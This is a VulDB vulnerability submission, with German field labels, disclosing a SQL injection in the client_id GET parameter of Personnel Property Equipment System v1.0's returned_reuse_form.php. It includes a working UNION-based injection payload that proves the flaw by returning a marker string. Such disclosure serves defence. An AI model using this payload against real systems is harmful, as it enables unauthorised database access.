| Titel | Personnel Property Equipment System v1.0 /PPES/admin/returned_reuse_form.php GET parameter client_id exists SQL injection vulnerability |
|---|
| Beschreibung | Personnel Property Equipment System v1.0 has SQL injection.
Vulnerability File: /PPES/admin/returned_reuse_form.php
GET parameter "client_id" exists SQL injection vulnerability
Payload1: client_id=-1' union all select null,null,null,null,concat(0x5152535556,0x666768),null,null,null-- -&dep_id=17&item_id=27
The UNION query is successful, and the expected string "QRSVfgh" appears, which proves that there is a SQL injection vulnerability.
|
|---|
| Quelle | ⚠️ https://github.com/LeozhangCA/CVEReport/blob/main/SQL.md |
|---|
| Benutzer | LeoZhangCA (UID 46757) |
|---|
| Einreichung | 13.05.2023 13:00 (vor 3 Jahren) |
|---|
| Moderieren | 14.05.2023 09:44 (21 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 228971 [SourceCodester Personnel Property Equipment System 1.0 GET Parameter returned_reuse_form.php client_id SQL Injection] |
|---|
| Punkte | 20 |
|---|